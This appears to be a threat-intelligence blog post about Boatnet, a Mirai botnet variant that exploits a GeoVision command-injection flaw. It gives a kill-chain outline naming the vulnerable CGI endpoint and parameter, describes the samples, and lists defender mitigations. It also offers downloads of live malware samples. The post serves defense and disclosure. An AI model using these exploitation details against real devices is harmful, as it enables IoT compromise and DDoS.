A new wave of Mirai-based malware is actively compromising routers, cameras, and DVRs worldwide. Here's what defenders need to know.
Multiple new samples of Boatnet, a Mirai botnet variant linked to the LZRD campaign, were uploaded to Threat Chain within the last 24 hours. These ELF binaries target ARM and x86 IoT devices, exploiting known command injection vulnerabilities in GeoVision hardware. If you operate IoT infrastructure, read on.
Boatnet is the operational name for a family of Mirai-derived Linux binaries currently being distributed as part of the LZRD botnet campaign. First observed in late 2025 and surging in early 2026, Boatnet inherits the core Mirai playbook — brute-forcing IoT device credentials and exploiting unpatched firmware — but adds a refreshed exploit chain targeting specific CVEs in discontinued GeoVision surveillance equipment.
The name comes from the binary filenames used by the operators: boatnet.arm6, boatnet.arm7, boatnet.x86, boatnet.mips — each compiled for a different processor architecture to maximize the range of vulnerable devices.
Boatnet's infection sequence follows a well-defined kill chain that can compromise a vulnerable device in under 60 seconds:
/DateSetting.cgi endpoint on port 80/443.szSrvIpAddr parameter — no authentication required (CVE-2024-6047).wget or curl from an attacker-controlled staging server.Command injection in GeoVision devices via the /DateSetting.cgi endpoint. The szSrvIpAddr parameter fails to sanitize user input, allowing unauthenticated remote code execution. Affects discontinued GeoVision models with no patch available.
Additional command injection vector in GeoVision IoT devices. Exploited in tandem with CVE-2024-6047 to ensure compromise even when partial input filtering is present.
The following hashes were submitted to ThreatChain on April 4, 2026 and are now searchable in our threat database:
| Attribute | Value |
|---|---|
| File Type | ELF (Linux executable) |
| Architectures | ARM6, x86, MIPS |
| Packing | UPX (Ultimate Packer for eXecutables) |
| Malware Family | Mirai / LZRD |
| Origin Countries | Netherlands (NL), Germany (DE) |
| YARA Matches | botnet_Yakuza, Linux_Trojan_Gafgyt, Linux_Trojan_Mirai |
| AV Detections | 26/36 engines (72.2%) |
| Triage Score | 10/10 (confirmed malicious) |
| Vendor Tags | ReversingLabs: Linux.Worm.Mirai, Intezer: Mirai family, CERT-PL: mirai |
Original Mirai source code leaked on HackForums. The IoT botnet era begins.
CVE-2024-6047 and CVE-2024-11120 disclosed for GeoVision IoT devices. No patches released (EOL hardware).
Akamai SIRT detects first Boatnet/LZRD exploitation of GeoVision devices in honeypots.
Barracuda reports massive DDoS surge from Kimwolf, Aisuru, and Mirai variant botnets including LZRD.
Fresh Boatnet samples uploaded to MalwareBazaar. ThreatChain indexes all IOCs within hours.
Boatnet represents a persistent truth in cybersecurity: abandoned hardware is an attacker's best friend. GeoVision discontinued the affected devices without issuing patches, leaving thousands of internet-facing cameras and DVRs permanently vulnerable. The LZRD operators know this — they're not discovering zero-days. They're farming devices that will never be fixed.
The broader Mirai ecosystem has now splintered into 116 distinct branches from over 21,000 samples. In 2026, three major botnets — Kimwolf, Aisuru, and Mirai variants like LZRD — are driving the most automated DDoS campaign the internet has ever seen. The barrier to entry is near zero: the source code is public, the targets are plentiful, and the victims don't know they're infected.
1. Inventory your IoT devices. If you have GeoVision cameras or DVRs, check if they're on the affected model list. If they are — disconnect them. There is no patch.
2. Block the IOCs. Add the hashes above to your EDR/SIEM. Search your network for connections to known LZRD C2 infrastructure.
3. Monitor for /DateSetting.cgi requests. Any HTTP request hitting this endpoint is almost certainly malicious. Alert on it.
4. Segment IoT networks. Cameras, printers, and smart devices should never share a network segment with critical infrastructure.
5. Disable UPnP. Many IoT devices use UPnP to punch holes in firewalls. Turn it off at the router level.
6. Enforce firmware lifecycle policies. If a vendor EOLs a device without patching known CVEs, replace it. The cost of a new camera is less than the cost of being part of a botnet.
WARNING: Live Malware
These are real malicious Boatnet binaries. Download only in an isolated research environment (VM, air-gapped lab). Files delivered as password-protected ZIPs.
ZIP password: infected
By clicking download, you acknowledge that you are a security researcher, these files contain live malware, and you accept full responsibility for their handling.
ThreatChain indexes 2.6M+ threat indicators from MalwareBazaar, URLhaus, Feodo Tracker, ScamSniffer, and community submissions. Search any hash, domain, wallet, or IP — free.
Search ThreatChain Now
Akamai SIRT — Active Exploitation of GeoVision IoT Devices
Barracuda — New Wave of Botnets Driving DDoS Chaos (2026)
Cloudflare — Inside Mirai: A Retrospective Analysis
MalwareBazaar — abuse.ch
ThreatChain — Decentralized Threat Intelligence
Published by ThreatChain Research · April 4, 2026 · threatchain.io
Discussion
Log in with Discord to join the discussion.
Login with Discord